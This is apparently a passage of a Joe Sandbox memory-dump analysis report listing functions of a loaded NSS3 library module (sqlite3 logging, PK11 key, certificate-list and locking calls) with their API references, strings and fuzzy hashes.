Part of subcall function 6C78F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C78F8C9
Part of subcall function 6C78F820: free.MOZGLUE(280F10EC,?,?), ref: 6C78F8D0

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 71f3292699d2ee8912351f5f3fb335bf458cf86be2d7fc0e85c98433c54d5176
Instruction ID: d4f4bbaba43531dd51ff3564c5474ceb4d832565a3c80445cdbe8c57766be348
Opcode Fuzzy Hash: 71f3292699d2ee8912351f5f3fb335bf458cf86be2d7fc0e85c98433c54d5176
Instruction Fuzzy Hash: 2901F5B2900605ABDA119FA5DC48857737CEA413393440539E90943A00E737F426C7E1

Function 6C7D6840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

PR_NewMonitor.NSS3(00000000,?,6C7DAA9B,?,?,?,?,?,?,?,00000000,?,6C7D80C1), ref: 6C7D6846

Part of subcall function 6C731770: calloc.MOZGLUE(00000001,0000019C,?,6C7315C2,?,?,?,?,?,00000001,00000040), ref: 6C73178D

PR_NewMonitor.NSS3(00000000,?,6C7DAA9B,?,?,?,?,?,?,?,00000000,?,6C7D80C1), ref: 6C7D6855

Part of subcall function 6C798680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C7455D0,00000000,00000000), ref: 6C79868B
Part of subcall function 6C798680: PR_NewLock.NSS3(00000000,00000000), ref: 6C7986A0
Part of subcall function 6C798680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C7986B2
Part of subcall function 6C798680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C7986C8
Part of subcall function 6C798680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C7986E2
Part of subcall function 6C798680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C7986EC
Part of subcall function 6C798680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C798700

PR_NewMonitor.NSS3(?,6C7DAA9B,?,?,?,?,?,?,?,00000000,?,6C7D80C1), ref: 6C7D687D

Part of subcall function 6C731770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C7318DE
Part of subcall function 6C731770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C7318F1

PR_NewMonitor.NSS3(?,6C7DAA9B,?,?,?,?,?,?,?,00000000,?,6C7D80C1), ref: 6C7D688C

Part of subcall function 6C731770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C7318FC
Part of subcall function 6C731770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C73198A

PR_NewLock.NSS3 ref: 6C7D68A5

Part of subcall function 6C8098D0: calloc.MOZGLUE(00000001,00000084,6C730936,00000001,?,6C73102C), ref: 6C8098E5

PR_NewLock.NSS3 ref: 6C7D68B4

Part of subcall function 6C8098D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C809946
Part of subcall function 6C8098D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C16B7,00000000), ref: 6C80994E
Part of subcall function 6C8098D0: free.MOZGLUE(00000000), ref: 6C80995E

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
String ID:
API String ID: 200661885-0
Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction ID: 50bc5d60b6233919d8e78d5eb9fd3ba681fe5f7377e16a4e97456114132f9550
Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction Fuzzy Hash: F801FBB0A01B1746E7616B764A183E777E89F01289F16083A8469CAB41EF61E5488BA1

Function 6C72AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C72AFDA

Strings

%s at line %d of [%.10s], xrefs: 6C72AFD3
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C72AFC4
misuse, xrefs: 6C72AFCE
unable to delete/modify collation sequence due to active statements, xrefs: 6C72AF5C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: aa0057eb354bd2f6b22fc0fd1e31c5ff41861b9e1b924b61dd84b1261c5a831b
Instruction ID: 3b8e5ac7831c5b8cfe777499e6561c26eed8ee349bd98df7dc0b6e840a61cb6a
Opcode Fuzzy Hash: aa0057eb354bd2f6b22fc0fd1e31c5ff41861b9e1b924b61dd84b1261c5a831b
Instruction Fuzzy Hash: DC91F475B002158FDB24CF59CA50BAEB7F1BF45324F1985A8E865AB791D338ED02CB60

Function 6C73C9B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128stringCOMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3 ref: 6C73CB3D
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C73CB4B
sqlite3_free.NSS3 ref: 6C73CB70
sqlite3_result_error_nomem.NSS3 ref: 6C73CB99

Strings

/G6/, xrefs: 6C73C9C2

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintfsqlite3_result_error_nomemstrlen
String ID: /G6/
API String ID: 1052848593-570549270
Opcode ID: 0a964d76d72a150cc276cb4c864b4a6534a3b52656e1c197591bb77bcbf64f0b
Instruction ID: 475f5c1a0b1fc41db754cc4ed6592cc97429f8d620d0cdc88c764db7e238dc86
Opcode Fuzzy Hash: 0a964d76d72a150cc276cb4c864b4a6534a3b52656e1c197591bb77bcbf64f0b
Instruction Fuzzy Hash: 54510432608B65CAC711EF34C54016BB7F0BF86799F109B2DE8D96B651EB348485C387

Function 6C7BCF00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C7BD01E

Part of subcall function 6C78E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C78E5A0

PK11_FreeSymKey.NSS3(00000000), ref: 6C7BD055

Part of subcall function 6C78ADC0: TlsGetValue.KERNEL32(?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE10
Part of subcall function 6C78ADC0: EnterCriticalSection.KERNEL32(?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE24
Part of subcall function 6C78ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C76D079,00000000,00000001), ref: 6C78AE5A
Part of subcall function 6C78ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE6F
Part of subcall function 6C78ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE7F
Part of subcall function 6C78ADC0: TlsGetValue.KERNEL32(?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AEB1
Part of subcall function 6C78ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AEC9

PK11_PubUnwrapSymKey.NSS3(?,00000000,6C7BCC55,00000107,00000000), ref: 6C7BD079
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7BD08C

Strings

/G6/, xrefs: 6C7BCF0F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: K11_$CriticalEnterErrorSectionValue$DeriveFreeUnlockUnwrapWithfreememset
String ID: /G6/
API String ID: 324975836-570549270
Opcode ID: 40a2c3ebf9188f266e7ffa5cfe9b6490a47de0982a5b79262df414f42edf20e3
Instruction ID: 41fd8f119b58dbd08b24464339d0e5b5050fcd251efb3c59a910c997d2820355
Opcode Fuzzy Hash: 40a2c3ebf9188f266e7ffa5cfe9b6490a47de0982a5b79262df414f42edf20e3
Instruction Fuzzy Hash: 2141C4B1901219DBE710CF18CD44BA9F7F5FF44308F0586AAE90CA7741E3319986CBA5

Function 6C6D4AC0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 118COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000B2F5), ref: 6C6D4C2B

Strings

winWrite1, xrefs: 6C6D4BC2
/G6/, xrefs: 6C6D4AD5
winWrite2, xrefs: 6C6D4C01
delayed %dms for lock/sharing conflict at line %d, xrefs: 6C6D4C24

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: /G6/$delayed %dms for lock/sharing conflict at line %d$winWrite1$winWrite2
API String ID: 632333372-1631576145
Opcode ID: cc0048ca4f7c601696f18047f32d0774ecd54bfd162e8e4e485e226b7a1c8c45
Instruction ID: b8e7b585d101c7ca182672af568eca0648d594917f26c5419e5592d76d3141ac
Opcode Fuzzy Hash: cc0048ca4f7c601696f18047f32d0774ecd54bfd162e8e4e485e226b7a1c8c45
Instruction Fuzzy Hash: EA41C271B043069BD714CF19C840AAEBBE9FFD5318F118A29F85487790E730E904CB92

Function 6C7B6AE0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C7B6B3E

Part of subcall function 6C7B6C20: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C7B6C8A
Part of subcall function 6C7B6C20: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C7B6C90

Part of subcall function 6C7B7E20: PR_SetError.NSS3(00000000,00000000), ref: 6C7B7E5F

PR_SetError.NSS3(FFFFD07B,00000000), ref: 6C7B6B84
PR_EnterMonitor.NSS3(?), ref: 6C7B6BE0
PR_ExitMonitor.NSS3(?), ref: 6C7B6C01

Strings

/G6/, xrefs: 6C7B6AEC

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: ErrorMonitorfree$CurrentEnterExitThread
String ID: /G6/
API String ID: 4197271849-570549270
Opcode ID: fd1ac6682420bb1756a0d241dcf22a76a676dbdbab56901b0c8b1863dddfb5aa
Instruction ID: e9ff91161e1a730429009041a1f93fed6a813e943023c3bf083a9dd850471089
Opcode Fuzzy Hash: fd1ac6682420bb1756a0d241dcf22a76a676dbdbab56901b0c8b1863dddfb5aa
Instruction Fuzzy Hash: 353139B1A0010157D7149E288E89B9F36789F4172CF180534EE09FFB92E731EA09C7E1

Function 6C854F00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C854F5D
free.MOZGLUE(?), ref: 6C854F74
free.MOZGLUE(?), ref: 6C854F82
GetLastError.KERNEL32 ref: 6C854F90

Strings

/G6/, xrefs: 6C854F0C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID: /G6/
API String ID: 17951984-570549270
Opcode ID: 3167b1c7792b24758bbe03a9086aa987cecb8d7b390804e4ad9f57e2e4fb3bb4
Instruction ID: 2696d0c4de1d374b3c1df3c582a451c203d95de2e494a83aab6fef660543cada
Opcode Fuzzy Hash: 3167b1c7792b24758bbe03a9086aa987cecb8d7b390804e4ad9f57e2e4fb3bb4
Instruction Fuzzy Hash: 0F3157B5A002094BEB10CF6DDD81BDBB3B8FFC5348F440628E815A7281D7769925C6A1

Function 6C80AAA2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C8A0D9C,00000000), ref: 6C80AAD4
_initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C8A0DA8,00000000), ref: 6C80AAE3

Strings

/G6/, xrefs: 6C80AAF1

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: _initialize_onexit_table
String ID: /G6/
API String ID: 2450287516-570549270
Opcode ID: 884dd0c3c6043915aa7216fa1aec32c8522c00fb5fc9ae65e085f8b6307bc24b
Instruction ID: 061edb6985874d726c3a2b2554d7701b6867ae95a1ce7e52efeed3cf18758db9
Opcode Fuzzy Hash: 884dd0c3c6043915aa7216fa1aec32c8522c00fb5fc9ae65e085f8b6307bc24b
Instruction Fuzzy Hash: 7B21D372A00605ABDF30DFA89F016CE3BB6AF02358F104A25EC15ABA80D771A945DB91

Function 6C7EA8F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C7D2AE9,00000000,0000065C), ref: 6C7EA91D

Part of subcall function 6C78ADC0: TlsGetValue.KERNEL32(?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE10
Part of subcall function 6C78ADC0: EnterCriticalSection.KERNEL32(?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE24
Part of subcall function 6C78ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C76D079,00000000,00000001), ref: 6C78AE5A
Part of subcall function 6C78ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE6F
Part of subcall function 6C78ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE7F
Part of subcall function 6C78ADC0: TlsGetValue.KERNEL32(?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AEB1
Part of subcall function 6C78ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AEC9

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C7D2AE9,00000000,0000065C), ref: 6C7EA934
SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000000,?,?,6C7D2AE9,00000000,0000065C), ref: 6C7EA949
free.MOZGLUE(?,00000000,0000065C), ref: 6C7EA952

Strings

*}l, xrefs: 6C7EA8F6

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: *}l
API String ID: 1595327144-3222333576
Opcode ID: b751d5e811198bc933d52be3b857227255e2a8d997e23ef07f5e87230fd2b3a8
Instruction ID: f7bfb8678b0affda360a40b9e5ce1b01836ef3ed4c7c1aa8e041141e7aa9a32f
Opcode Fuzzy Hash: b751d5e811198bc933d52be3b857227255e2a8d997e23ef07f5e87230fd2b3a8
Instruction Fuzzy Hash: E1314DB56012019FD704CF19DA84E62BBF8FF4D328B1581A9E8098F756E730E800CFA1

Function 6C76ABF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74stringCOMMON

Download Yara Rule

APIs

CERT_GetFirstEmailAddress.NSS3(?), ref: 6C76AC0B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C76AC26
PR_Now.NSS3 ref: 6C76AC34
CERT_GetNextEmailAddress.NSS3(?,00000000), ref: 6C76AC6E

Strings

/G6/, xrefs: 6C76ABFF

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: AddressEmail$FirstNextstrcmp
String ID: /G6/
API String ID: 3008928262-570549270
Opcode ID: 138bcebc995bcc31fa2c2907f83c01fc90ae67ae5f9557487279924519c47ca1
Instruction ID: 3d886a0dba972ab6394c783d3175716473752b84149ee7db152c422fafa60487
Opcode Fuzzy Hash: 138bcebc995bcc31fa2c2907f83c01fc90ae67ae5f9557487279924519c47ca1
Instruction Fuzzy Hash: E7118471701615AFA7009E6A9E859AB7BE8AF4576CB144438ED18C7B02EB20D918C6A2

Function 6C76ACB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C76ACC2

Part of subcall function 6C742F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C742F0A
Part of subcall function 6C742F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C742F1D

Part of subcall function 6C742AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C740A1B,00000000), ref: 6C742AF0
Part of subcall function 6C742AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C742B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C76AD5E

Part of subcall function 6C7857D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C74B41E,00000000,00000000,?,00000000,?,6C74B41E,00000000,00000000,00000001,?), ref: 6C7857E0
Part of subcall function 6C7857D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C785843

CERT_DestroyCertList.NSS3(?), ref: 6C76AD36

Part of subcall function 6C742F50: CERT_DestroyCertificate.NSS3(?), ref: 6C742F65
Part of subcall function 6C742F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C742F83

free.MOZGLUE(?), ref: 6C76AD4F

Strings

/G6/, xrefs: 6C76ACB8

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID: /G6/
API String ID: 132756963-570549270
Opcode ID: 3c2d3e4c7c384450d6563ce1a8380166156bcb6aa92c14d789b5fd999e0492e9
Instruction ID: a8b47336b5181efae61574ead33d1311ab3e1a6ffd9748cf2151341676922487
Opcode Fuzzy Hash: 3c2d3e4c7c384450d6563ce1a8380166156bcb6aa92c14d789b5fd999e0492e9
Instruction Fuzzy Hash: BD21C6B1D001149BEB10DF69DA0A5EEB7B4EF05318F454078DC05B7A05F731AA59CBE1

Function 6C77CAA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C75B1EE,D958E836,?,6C7951C5), ref: 6C77CAFA
PR_UnloadLibrary.NSS3(?,6C7951C5), ref: 6C77CB09
PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C75B1EE,D958E836,?,6C7951C5), ref: 6C77CB2C
PR_UnloadLibrary.NSS3(6C7951C5), ref: 6C77CB3E

Strings

NSS_DISABLE_UNLOAD, xrefs: 6C77CAF5, 6C77CB27

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: LibrarySecureUnload
String ID: NSS_DISABLE_UNLOAD
API String ID: 4190191112-1204168554
